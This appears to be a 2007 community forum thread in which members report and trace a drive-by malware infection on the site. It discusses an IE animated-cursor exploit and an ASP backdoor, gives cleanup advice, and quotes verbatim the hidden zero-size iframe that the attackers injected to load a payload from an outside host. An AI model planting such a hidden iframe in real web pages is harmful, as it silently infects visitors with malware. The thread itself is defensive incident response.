Forum Home Forum Home > Site News, Newbies, Help and Improvements > Report bugs here
  New Posts New Posts RSS Feed - Virus on front page
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Topic ClosedVirus on front page

 Post Reply Post Reply Page  <123>
Author
Message
Dean View Drop Down
Special Collaborator
Special Collaborator
Avatar
Retired Admin and Amateur Layabout

Joined: May 13 2007
Location: Europe
Status: Offline
Points: 37575
Direct Link To This Post Posted: June 07 2007 at 22:08
McAfee should be deleting the virus. Your virus scan says it has, but it re-appears - I don't understand, unless you keep getting re-infected.
 
The file pay[1].mid is in teh Internet Explorer Temporary cache, so flushing out your cache should remove the file, (Tools/Internet Options/General/Browsing History/Delete...).
 
Sorry, that's as much as I can help.
What?
Back to Top
avestin View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator

Joined: September 18 2005
Status: Offline
Points: 12625
Direct Link To This Post Posted: June 07 2007 at 22:10
^^^
Thanks for the help!


Edited by avestin - June 07 2007 at 22:11
Back to Top
JayDee View Drop Down
Forum Senior Member
Forum Senior Member
Avatar
VIP Member

Joined: September 07 2005
Location: Elysian Fields
Status: Offline
Points: 10063
Direct Link To This Post Posted: June 07 2007 at 22:13
I'm experiencing it as well. An automatic download box pops up on my screen. It has the "Florida-rentals"  as file name. I ignore it, but everytime I return to the forum frontpage, it pops up,  it's  quite annoying.

Back to Top
JayDee View Drop Down
Forum Senior Member
Forum Senior Member
Avatar
VIP Member

Joined: September 07 2005
Location: Elysian Fields
Status: Offline
Points: 10063
Direct Link To This Post Posted: June 07 2007 at 22:19

Back to Top
VanderGraafKommandöh View Drop Down
Prog Reviewer
Prog Reviewer
Avatar

Joined: July 04 2005
Location: Malaria
Status: Offline
Points: 89372
Direct Link To This Post Posted: June 07 2007 at 22:30
No problems my end, as I have Adblock + for Firefox (which I thought Tony R had as well?).

I'm glad I don't have it though.  I hope you all get it fixed soon.
Back to Top
memowakeman View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator

Joined: May 19 2005
Location: Mexico City
Status: Offline
Points: 13032
Direct Link To This Post Posted: June 07 2007 at 23:11
Im having this problem too...

Follow me on twitter @memowakeman
Back to Top
Dean View Drop Down
Special Collaborator
Special Collaborator
Avatar
Retired Admin and Amateur Layabout

Joined: May 13 2007
Location: Europe
Status: Offline
Points: 37575
Direct Link To This Post Posted: June 07 2007 at 23:46
Sorry I'm being remedial - the virus will reappear if the Admin team haven't got rid of it from the home page yet.
 
If anyone is not running a virus checker, you can download a free one from Grisoft called AVG - it''s very good for a freebie.
What?
Back to Top
Rocket_Bob View Drop Down
Forum Groupie
Forum Groupie
Avatar

Joined: June 05 2007
Status: Offline
Points: 48
Direct Link To This Post Posted: June 07 2007 at 23:47
Originally posted by Geck0 Geck0 wrote:

No problems my end, as I have Adblock + for Firefox (which I thought Tony R had as well?).

I'm glad I don't have it though.  I hope you all get it fixed soon.
Nice tip Gecko   I`m going to use adblock   TY  Smile
Back to Top
Dean View Drop Down
Special Collaborator
Special Collaborator
Avatar
Retired Admin and Amateur Layabout

Joined: May 13 2007
Location: Europe
Status: Offline
Points: 37575
Direct Link To This Post Posted: June 08 2007 at 01:03
Looks like these two attacks are related:
Originally posted by Majestic_Mayhem Majestic_Mayhem wrote:

This is the exact file name:
 
Originally posted by Rivertree Rivertree wrote:

I had a look at the html source code
a tricky iframe was inserted with the webaddress
http://www.florida-rentals-direct.com/Realestate_images/app.htm
do you know something about it?
 
but I'm not sure that they are directly related to the Exploit-ANIfile.c trojan (pay.mid).
 
The Exploit-ANIfile trojan exploits a loop-hole in IE6 & IE7's animated cursor routine. Unfortunately the trojan can be buried in any file that can be placed on a webpage (.jpg, .gif, .mid etc) and if it is really an animated cursor file (.ani) that has been renamed it will be automatically parsed by IE. To prevent this disable the "open files based on content, not file extension" setting in Tools/Internet Options/Security/Custom Level .
 
 
As the virus-checker spots pay.mid as the vilian, then it is evident that this midi file is not really a midi file, but a disguised ani file - doing the above should stopthat file being treated as a .ani - but it will not stop you virus checker finding it whenever you visit the infected page(s)
What?
Back to Top
Sean Trane View Drop Down
Special Collaborator
Special Collaborator

Prog Folk

Joined: April 29 2004
Location: Heart of Europe
Status: Offline
Points: 20250
Direct Link To This Post Posted: June 08 2007 at 04:51
Got it too since yesterday morning, but it is also linked to the main forum page.
let's just stay above the moral melee
prefer the sink to the gutter
keep our sand-castle virtues
content to be a doer
as well as a thinker,
prefer lifting our pen
rather than un-sheath our sword
Back to Top
mystic fred View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator

Joined: March 13 2006
Location: Londinium
Status: Offline
Points: 4252
Direct Link To This Post Posted: June 08 2007 at 05:12
i found this trojan virus- it appeared on my pc at home and two where i work - the mac affee picked it up but couldn't delete or quarantine it. it seemed to be lodged in my temporary internet file which i cleaned out and now it seems to have gone. Ermm
Prog Archives Tour Van
Back to Top
Dean View Drop Down
Special Collaborator
Special Collaborator
Avatar
Retired Admin and Amateur Layabout

Joined: May 13 2007
Location: Europe
Status: Offline
Points: 37575
Direct Link To This Post Posted: June 08 2007 at 06:07
Okay, I've tracked the little fCensoredker down some more, which may help you guys get rid of this damn thing.
 
pay.mid arrives in a file called ani.htm
florida-rental is deployed from a file called app.htm
 
I haven't found how these two files are attached to the Progarchive main pages yet, my guess is that they are burried in a javascript routine in one of the Ads since pages that do not have adverts are not affected
 
PA Admins need to get on top of this because the pay.mid is now deploying Downloader.Small.58.aw - a different virus to the one from yesterday. It won't take long before the bCensoredards find one that gets through the virus-scanners.
What?
Back to Top
Dean View Drop Down
Special Collaborator
Special Collaborator
Avatar
Retired Admin and Amateur Layabout

Joined: May 13 2007
Location: Europe
Status: Offline
Points: 37575
Direct Link To This Post Posted: June 08 2007 at 07:15

I've found the virus loader on the main Forum page - it does not come in via the Ads, but is buried in the threads list under Other porgessive Music Related Discussions:

<td><a href="forum_topics.asp?FID=61">Books and misc reviews</a><br />(new post by admins only)<iframe src="http://www.florida-rentals-direct.com/Realestate_images/app.htm" width="0" height="0" frameborder="0"></iframe></td>

There is probably something similar on the main page too, Rivertree  found a similar iframe on the Psyopus band page yesterday - so there could be hundreds of them - to me, it looks like the PA server has been hacked.
 
What?
Back to Top
Tony R View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator / Retired Admin

Joined: July 16 2004
Location: UK
Status: Offline
Points: 11979
Direct Link To This Post Posted: June 08 2007 at 07:21
Thanks Dean. I am trying to contact Max at this moment.
I've got this virus back today, after clearing it last night.

What can I do. I am running AVG anti-virus, I thought I would be protected from things like this.

I have now switched back to Firefox. Am I better protected?

Back to Top
Dean View Drop Down
Special Collaborator
Special Collaborator
Avatar
Retired Admin and Amateur Layabout

Joined: May 13 2007
Location: Europe
Status: Offline
Points: 37575
Direct Link To This Post Posted: June 08 2007 at 07:46
Originally posted by Tony R Tony R wrote:

Thanks Dean. I am trying to contact Max at this moment.
I've got this virus back today, after clearing it last night.

What can I do. I am running AVG anti-virus, I thought I would be protected from things like this.

I have now switched back to Firefox. Am I better protected?

 
As far as I know only Internet Explorer based browser are vunerable to the ANI Trojan but the florida-rentals thing loads both viruses and I do not know whether mozilla-based browsers (ie Firefox) are immune to the other one. Firefox caches temporary internet data in a different way to IE so the virus scan probably won't find it, but it still would have been loaded when the iframe was loaded - I am not qualified to say whether this makes it safer - so I'd play safe and say it is not.
 
Your anti-virus software will find and kill the virus, but it cannot stop it being loaded onto your PC when you visit affected pages.
 
I'm getting paranoid at the moment (Master of Reality arrives tomorrowLOL) so I am running the virus checker every time I load a page from PA and PA Forum. I suggest everyone does the same.
What?
Back to Top
Tony R View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator / Retired Admin

Joined: July 16 2004
Location: UK
Status: Offline
Points: 11979
Direct Link To This Post Posted: June 08 2007 at 07:47
You can individual pages?
How?
Back to Top
Dean View Drop Down
Special Collaborator
Special Collaborator
Avatar
Retired Admin and Amateur Layabout

Joined: May 13 2007
Location: Europe
Status: Offline
Points: 37575
Direct Link To This Post Posted: June 08 2007 at 07:52

Any new page gets loaded into the browsers cache, with IE this is the folder Temporary Internet Files. I use AVG to do a Selected Area Scan of that folder - it's pretty quick that way

For IE its:
 
c:\Documents and Settings\<<your_user_name>\Local Settings\Temporary Internet Files
 
I'm affraid I cannot help with other browsers.
What?
Back to Top
Tony R View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator / Retired Admin

Joined: July 16 2004
Location: UK
Status: Offline
Points: 11979
Direct Link To This Post Posted: June 08 2007 at 08:06
Thanks again Dean
Back to Top
avestin View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator

Joined: September 18 2005
Status: Offline
Points: 12625
Direct Link To This Post Posted: June 08 2007 at 11:59
I don't get the message anymore. Has this been taken care of (probably) ?
 
Thanks Dean, for the online technical support!
 
 
Back to Top
Atkingani View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator / Retired Admin

Joined: October 21 2005
Location: Terra Brasilis
Status: Offline
Points: 12288
Direct Link To This Post Posted: June 08 2007 at 12:15
Graphix informed the following:

1) The virus scan found 1 virus on PA server that is an ASP file used as an IIS Back door that could access files and database on the server. It could be the reason why :

2) 2 rows in the database were infected. The florida-rentals-direct.com iframe HTML code was inserted in the description of 2 forum topics Books and misc reviews and  Collaborators discussions (Not Related to Music). Each time, one of these forum topics was displayed, the unwanted iframe HTML hacked code was also displayed... I removed the code from the database.

If you find anything else, let me know. Your help is really appreciated, thanks again Smile
Guigo

~~~~~~
Back to Top
 Post Reply Post Reply Page  <123>

Forum Jump Forum Permissions View Drop Down



This page was generated in 0.142 seconds.
Donate monthly and keep PA fast-loading and ad-free forever.